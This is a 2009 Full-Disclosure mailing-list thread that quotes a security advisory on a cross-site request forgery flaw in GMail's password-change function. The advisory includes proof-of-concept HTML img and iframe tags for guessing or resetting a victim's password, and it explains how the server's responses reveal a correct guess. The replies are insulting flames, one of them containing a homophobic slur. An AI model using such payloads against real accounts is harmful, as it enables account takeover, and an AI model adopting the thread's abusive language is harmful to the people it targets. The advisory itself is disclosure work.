-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mr. Stark,
You're body fat seems to be fairly high, you should consider a cutting phase and quitting the muscle milk and whatever cheap steroids you use. Your looking like a fat dumb homosexual in those tights. Someone with you're levels of insecurity shouldn't be in computer security. - -bm On Wed, 04 Mar 2009 16:44:50 -0500 Jason Starks <[email protected]> wrote: >Ah, probably not. Your stringing together words to make sentences >is what >I'll regret reading. I'll continue to use my muscle milk and >you'll continue >to work your 9-5. The world turns once again! > >On Wed, Mar 4, 2009 at 4:06 PM, Valdis' Mustache < >[email protected]> wrote: > >> Mister Snarks, >> >> I've never been anything but who I purport to be, the humble >upper >> facial hair quadrant of a loquacious sysadmin. Low of birth, >though >> noble in aspiration, a student of history and of the many >mustaches >> who came before myself. >> >> You, young scholar, should be wary, though! Prospective >employers do >> make regular use of search engines, "googling" potential >candidates to >> gain insight into possible character flaws! >> >> True, your clean and jerk abilities as archived on the YouTube >are >> admirable, but acting a fool on security lists is something >normally >> reserved only for those in academia, who are markedly difficult >if not >> impossible to unseat from their comfortable chairs, as >indisputably >> underscored by the e-antics of this mutache's owner, and, of >course, >> Mssr. Schmehl. >> >> You'll come to regret your lack of anonymity, as your posts will >live >> on for eternity, much as I've came to regret my unfortunate >> association with the unruly beardlike growth connecting to me >from the >> south, and my unavoidable tenuous connection with those >objectionable >> and uncouth sideburns. >> >> >> Your humble servant, >> I baffi di Valdis >> >> On Wed, Mar 4, 2009 at 12:55 PM, Jason Starks ><[email protected]> >> wrote: >> > I know, its insane. It is a new trend, though, just like >people >> registering >> > gmail accounts just to flame and troll on FD! >> > >> > Its like, your credability like, goes like, ok you start like >at 0, and >> then >> > like, it goes like to -1, and like, then even lower like. >> > >> > Absolutely genius. >> > >> > x0x0x0x0x0x0x0x0x0x >> > >> > On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee ><[email protected]> wrote: >> >> >> >> This was 2 years well spent... NOT! >> >> >> >> Seriously what is with all these people popping up releasing >advisories >> >> that are absolute SHIT? Is it to try and get jobs or what? >> >> >> >> >> >> On Tue, Mar 3, 2009 at :55 AM, ISecAuditors Security >Advisories < >> >> advisories at isecauditors.com> wrote: >> >> >> >> > ============================================= >> >> > INTERNET SECURITY AUDITORS ALERT 2007-003 >> >> > - Original release date: August 1st, 2007 >> >> > - Last revised: January 11th, 2009 >> >> > - Discovered by: Vicente Aguilera Diaz >> >> > - Severity: 3/5 >> >> > ============================================= >> >> > >> >> > I. VULNERABILITY >> >> > ------------------------- >> >> > CSRF vulnerability in GMail service >> >> > >> >> > II. BACKGROUND >> >> > ------------------------- >> >> > Gmail is Google's free webmail service. It comes with built- >in Google >> >> > search technology and over 2,600 megabytes of storage (and >growing >> >> > every day). You can keep all your important messages, files >and >> >> > pictures forever, use search to quickly and easily find >anything >> >> > you're looking for, and make sense of it all with a new way >of viewing >> >> > messages as part of conversations. >> >> > >> >> > III. DESCRIPTION >> >> > ------------------------- >> >> > Cross-Site Request Forgery, also known as one click attack >or session >> >> > riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a >kind of >> >> > malicious exploit of websites. Although this type of attack >has >> >> > similarities to cross-site scripting (XSS), cross-site >scripting >> >> > requires the attacker to inject unauthorized code into a >website, >> >> > while cross-site request forgery merely transmits >unauthorized >> >> > commands from a user the website trusts. >> >> > >> >> > GMail is vulnerable to CSRF attacks in the "Change >Password" >> >> > functionality. The only token for authenticate the user is >a session >> >> > cookie, and this cookie is sent automatically by the >browser in every >> >> > request. >> >> > >> >> > An attacker can create a page that includes requests to the >"Change >> >> > password" functionality of GMail and modify the passwords >of the users >> >> > who, being authenticated, visit the page of the attacker. >> >> > >> >> > The attack is facilitated since the "Change Password" >request can be >> >> > realized across the HTTP GET method instead of the POST >method that is >> >> > realized habitually across the "Change Password" form. >> >> > >> >> > IV. PROOF OF CONCEPT >> >> > ------------------------- >> >> > 1. An attacker create a web page "csrf-attack.html" that >realize many >> >> > HTTP GET requests to the "Change Password" functionality. >> >> > >> >> > For example, a password cracking of 3 attempts (see >"OldPasswd" >> >> > parameter): >> >> > ... >> >> > <img >> >> > src=" >> >> > >> >> > >> >https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro >up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123& >p=&save=Save >> >> > "> >> >> > <img >> >> > src=" >> >> > >> >> > >> >https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro >up1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123& >p=&save=Save >> >> > "> >> >> > <img >> >> > src=" >> >> > >> >> > >> >https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro >up1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123& >p=&save=Save >> >> > "> >> >> > ... >> >> > >> >> > or with hidden frames: >> >> > ... >> >> > <iframe >> >> > src=" >> >> > >> >> > >> >https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro >up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123& >p=&save=Save >> >> > "> >> >> > <iframe >> >> > src=" >> >> > >> >> > >> >https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro >up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123& >p=&save=Save >> >> > "> >> >> > <iframe >> >> > src=" >> >> > >> >> > >> >https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&gro >up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123& >p=&save=Save >> >> > "> >> >> > ... >> >> > >> >> > The attacker can use deliberately a weak new password (see >"Passwd" >> >> > and "PasswdAgain" parameters), this way he can know if the >analysed >> >> > password is correct without need to modify the password of >the victim >> >> > user. >> >> > >> >> > Using weak passwords the "Change Password" response is: >> >> > - " The password you gave is incorrect. ", if the analysed >password >> >> > is not correct. >> >> > - " We're sorry, but you've selected an insecure password. >In order >> >> > to protect the security of your account, please click >"Password >> >> > Strength" to get tips on choosing to safer password. ", if >the >> >> > analysed password is correct and the victim password is not >modified. >> >> > >> >> > If the attacker want to modify the password of the victim >user, the >> >> > waited response message is: " Your new password has been >saved - OK ". >> >> > >> >> > In any case, the attacker evades the restrictions imposed >by the >> >> > captcha of the authentication form. >> >> > >> >> > 2. A user authenticated in GMail visit the "csrf- >attack.html" page >> >> > controlled by the attacker. >> >> > >> >> > For example, the attacker sends a mail to the victim (a >GMail account) >> >> > and provokes that the victim visits his page (social >engineering). So, >> >> > the attacker insures himself that the victim is >authenticated. >> >> > >> >> > 3. The password cracking is executed transparently to the >victim. >> >> > >> >> > V. BUSINESS IMPACT >> >> > ------------------------- >> >> > - Selective DoS on users of the GMail service (changing >user >> password). >> >> > - Possible access to the mail of other GMail users. >> >> > >> >> > VI. SYSTEMS AFFECTED >> >> > ------------------------- >> >> > Gmail service. >> >> > >> >> > VII. SOLUTION >> >> > ------------------------- >> >> > No solution provided by vendor. >> >> > >> >> > VIII. REFERENCES >> >> > ------------------------- >> >> > http://www.gmail.com >> >> > >> >> > IX. CREDITS >> >> > ------------------------- >> >> > This vulnerability has been discovered and reported by >> >> > Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) >com). >> >> > >> >> > X. REVISION HISTORY >> >> > ------------------------- >> >> > July 31, 2007: Initial release >> >> > August 1, 2007: Fewer corrections. >> >> > December 30, 2008: Last details. >> >> > >> >> > XI. DISCLOSURE TIMELINE >> >> > ------------------------- >> >> > July 30, 2007: Vulnerability acquired by >> >> > Internet Security Auditors. >> >> > August 1, 2007: Initial notification sent to the >> >> > Google security team. >> >> > August 1, 2007: Google security team request additional >> >> > information. >> >> > about and start review the >vulnerability. >> >> > August 13, 2007: Request information about the status. >> >> > August 15, 2007: Google security team responds that they >are still >> >> > working on this. >> >> > September 19, 2007: Request for the status. No response. >> >> > November 26, 2007: Request for the status. No response. >> >> > January 2, 2008: Request for the status. No response. >> >> > January 4, 2008: Request for the status. No response. >> >> > January 11, 2008: Request for the status. No response. >> >> > January 15, 2008: Request for the status. Automated >response. >> >> > January 18, 2008: Google security team informs that don't >expect >> >> > behaviour to change in the short term >giving >> >> > the justification. >> >> > We deconstruct those arguments as >insufficient. >> >> > No more responses. >> >> > December 30, 2008: Request for the status. Confirmation >from Google >> >> > they won't change the consideration >about this. >> >> > January 11, 2009: Publication to Bugtraq. Rejected twice. >> >> > No reasons. >> >> > March 03, 2009: General publication for disclosure in >other lists. >> >> > >> >> > XII. LEGAL NOTICES >> >> > ------------------------- >> >> > The information contained within this advisory is supplied >"as-is" >> >> > with no warranties or guarantees of fitness of use or >otherwise. >> >> > Internet Security Auditors accepts no responsibility for >any damage >> >> > caused by the use or misuse of this information. >> >> > >> >> > _______________________________________________ >> >> > Full-Disclosure - We believe in it. >> >> > Charter: http://lists.grok.org.uk/full-disclosure- >charter.html >> >> > Hosted and sponsored by Secunia - http://secunia.com/ >> >> > >> >> >> >> _______________________________________________ >> >> Full-Disclosure - We believe in it. >> >> Charter: http://lists.grok.org.uk/full-disclosure- >charter.html >> >> Hosted and sponsored by Secunia - http://secunia.com/ >> > >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmvIAQACgkQhNp8gzZx3sifPQP/Z/JwoxHfL+/YWIumE6ohkDzHigcM FFMGnJtPy1PUYahP2Kkq4oBUiFgNsqWsBjvNnp+hrILgO6w73OasuLZQSvYX7hCMK8k1 eK7r0H5fjSlqoRhkJSGhgBDL4H7q1nMrkr0x4zGO7Jeeeq8DuU23x2A1UvnJCE+RAo65 vFaHNwE= =uYwk -----END PGP SIGNATURE----- -- Click to find information on your credit score and your credit report. http://tagline.hushmail.com/fc/BLSrjkqeNwyn7W35g2EhsFTPSKje8aswj4QTZvrXUmflUijsGrXajBFpRZG/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
